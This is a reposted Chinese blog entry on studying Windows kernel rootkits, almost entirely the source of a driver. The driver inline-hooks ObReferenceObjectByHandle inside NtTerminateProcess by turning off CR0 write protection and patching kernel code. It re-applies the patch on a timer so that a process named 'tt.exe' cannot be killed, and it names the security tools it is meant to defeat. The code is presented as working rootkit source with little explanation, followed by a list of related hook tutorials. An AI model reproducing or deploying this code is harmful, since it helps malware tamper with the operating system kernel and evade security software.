驱动学习----RootKits---InlineHook
2012-01-01 22:29
204 查看
from:http://blog.sina.com.cn/s/blog_61d65e360100o5lx.html
驱动学习----RootKits---InlineHook(原创)
(2011-01-03 11:03:22)
转载▼
///Inline_Hook ObReferenceObjectByHandle
// By Yankai cleveise Auti Micropoint 360safe IceSword ....
////////////////////////////////////
#include <ntddk.h>
#define STATUS_WARNING ((NTSTATUS)0x80000000L)
#define PAGEDCODE code_seg("PAGE")
#define LOCKEDCODE code_seg()
#define INITCODE code_seg("INIT")
#define PAGEDDATA data_seg("PAGE")
#define LOCKEDDATA data_seg()
#define ININDATA data_seg("INIT")
typedef struct _LDR_DATA_TABLE_ENTRY{
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT TlsIndex;
LIST_ENTRY HashLinks;
PVOID SectionPointer;
ULONG CheckSum;
ULONG TimeDataStamp;
PVOID LoadedImports;
PVOID EntryPointActivationContext;
PVOID PatchInformation;
}LDR_DATA_TABLE_ENTRY,*PLDR_DATA_TABLE_ENTRY;
ULONG ObReferenceObjectByHandleAddress;
ULONG NtTerminateProcessAddress;
ULONG Recover;
PULONG InsertAddress;
KTIMER timer;
KDPC mydpc;
LARGE_INTEGER largeint;
LONG RootkitAddress;
char* ProtectName="tt.exe";
VOID MyUnload(PDRIVER_OBJECT pdriverobj)
{
KeCancelTimer(&timer);
*InsertAddress=Recover;
}
#pragma LOCKEDCODE
VOID DPCFUN()
{
ULONG xxx;
_asm
{
cli
push eax;
mov eax,CR0;
mov xxx,eax;
and eax,0x0FFFEFFFF;
mov CR0,eax;
pop eax;
sti
};
*InsertAddress=(ULONG)RootkitAddress;
_asm
{
push eax;
mov eax,xxx;
mov CR0,eax;
pop eax;
};
KeSetTimer(&timer,largeint,&mydpc);
}
MYObReferenceObjectByHandle(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
NTSTATUS status;
PEPROCESS Process;
POBJECT_TYPE xx;
xx=*PsProcessType;
if (xx==ObjectType)
{
status=ObReferenceObjectByHandl(Handle,DesiredAccess,ObjectType,AccessMode,&Process,HandleInformation);
if (_stricmp((char*)((char*)Process+0x174), ProtectName) == 0)
{
if (Handle==(HANDLE)-1)
{
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
else
{
status=STATUS_WARNING;
return status ;
}
}
else
{
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
}
else
{
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
return status;
}
_declspec(naked)RootkitObReferenceObjectByHandle()
{
_asm
{
push ebp;
mov ebp,esp;
sub esp,0x10;
mov ebp,MYObReferenceObjectByHandle;
mov dword ptr [esp],ebp;
mov ebp,dword ptr [esp+10h];
ret 10h;
};
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING pRegistryPath)
{
NTSTATUS status=STATUS_SUCCESS;
KIRQL oldirql;
UNICODE_STRING ObReferenceObjectByHandleName;
int i;
char FindCode[]={0x6A,0x01,0xFF,0x75,0x08,0xE8};
char CheckCode[]={0x8B,0xFF,0x55};
LONG Offset;
LONG uAttr;
ULONG NtTerminateProcessOffset=0x0F1C2A;
char* PointYK;
PULONG DriverAddress;
PULONG DriverSection;
PLIST_ENTRY plistbegin;
PLIST_ENTRY plistend;
PLDR_DATA_TABLE_ENTRY pldr;
UNICODE_STRING DllName;
ULONG ntoskrnladdr;
UNICODE_STRING filename;
largeint.QuadPart=-550000;
RtlInitUnicodeString(&filename,L"ntoskrnl.exe");
RtlInitUnicodeString(&ObReferenceObjectByHandleName,L"ObReferenceObjectByHandle");
KeInitializeDpc(&mydpc,(PKDEFERRED_ROUTINE)DPCFUN,NULL);
KeInitializeTimer(&timer);
pDriverObject->DriverUnload=MyUnload;
ObReferenceObjectByHandleAddress=(ULONG)MmGetSystemRoutineAddress(&ObReferenceObjectByHandleName);
DriverAddress=(ULONG*)pDriverObject;
DriverSection=(ULONG*)(*(ULONG*)((char*)DriverAddress+0x014));
plistbegin=plistend=DriverSection;
pldr=(PLDR_DATA_TABLE_ENTRY)plistbegin;
DllName=pldr->BaseDllName;
do
{
pldr=(PLDR_DATA_TABLE_ENTRY)(pldr->InLoadOrderLinks.Flink);
DllName=pldr->BaseDllName;
if (RtlCompareUnicodeString(&DllName, &filename,TRUE) == 0)
{
ntoskrnladdr=(ULONG)(pldr->DllBase);
break;
}
plistend=(PLIST_ENTRY)pldr;
}while(plistbegin!=plistend);
NtTerminateProcessAddress=ntoskrnladdr+NtTerminateProcessOffset;
PointYK=(char*)NtTerminateProcessAddress;
if (!(PointYK[0]==CheckCode[0] && PointYK[1]==CheckCode[1] && PointYK[2]==CheckCode[2]))
{
return 0;
}
for (i=0;i<200;i++)
{
if (PointYK[i]==FindCode[0] && PointYK[i+1]==FindCode[1] && PointYK[i+2]==FindCode[2] && PointYK[i+3]==FindCode[3] && PointYK[i+4]==FindCode[4] && PointYK[i+5]==FindCode[5])
{
InsertAddress=(PULONG)(PointYK+i+6);
Recover=(ULONG)*InsertAddress;
Offset=(ULONG)InsertAddress+4;
RootkitAddress=(ULONG)RootkitObReferenceObjectByHandle-Offset;
break;
}
}
oldirql=KeRaiseIrqlToDpcLevel();
_asm
{
cli
push eax;
mov eax,CR0;
mov uAttr,eax;
and eax,0x0FFFEFFFF;
mov CR0,eax;
pop eax;
sti
};
*InsertAddress=(ULONG)RootkitAddress;
_asm
{
push eax;
mov eax,uAttr;
mov CR0,eax;
pop eax;
};
KeLowerIrql(oldirql);
KeSetTimer(&timer,largeint,&mydpc);
return status;
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 驱动学习---RootKits--inline hook 小插曲(
- 我的学习笔记之四——inline使用DLL进行全局HOOK的改进(ring3_inline_dll_hook_Messagebox_临界区)
- Win64 驱动内核编程-23.Ring0 InLineHook 和UnHook
- 我的学习笔记之五——inline_HOOK完美篇(ring3_inline_EXE_hook_Messagebox完美篇)
- Hook :Inline Hook学习资料以及总结问题
- 我的学习笔记之三——inline使用DLL进行全局HOOK(ring3_inline_dll_hook_Messagebox)
- 学习windows 应用层 inline hook 原理总结
- android inline hook 学习笔记
- 学习windows 应用层 inline hook 原理总结
- [IRP HOOK] 键盘过滤驱动学习
- xx_学驱动 -- INLINE HOOK 过简单驱动保护、、
- INLINE HOOK过简单驱动保护的理论知识和大概思路
- 【转】 xx_学驱动 -- INLINE HOOK 过简单驱动保护、、
- 学习windows 应用层 inline hook 原理总结
- INLINE HOOK过驱动保护的理论知识和大概思路
- 学习windows 应用层 inline hook 原理总结
- Inline Hook检测模块到驱动
- XP中Inline HOOK 8042驱动实现键盘钩子的方法
- 我的学习笔记之三——inline使用DLL进行全局HOOK(ring3_inline_dll_hook_Messagebox)
- 领域驱动设计-学习笔记 分层架构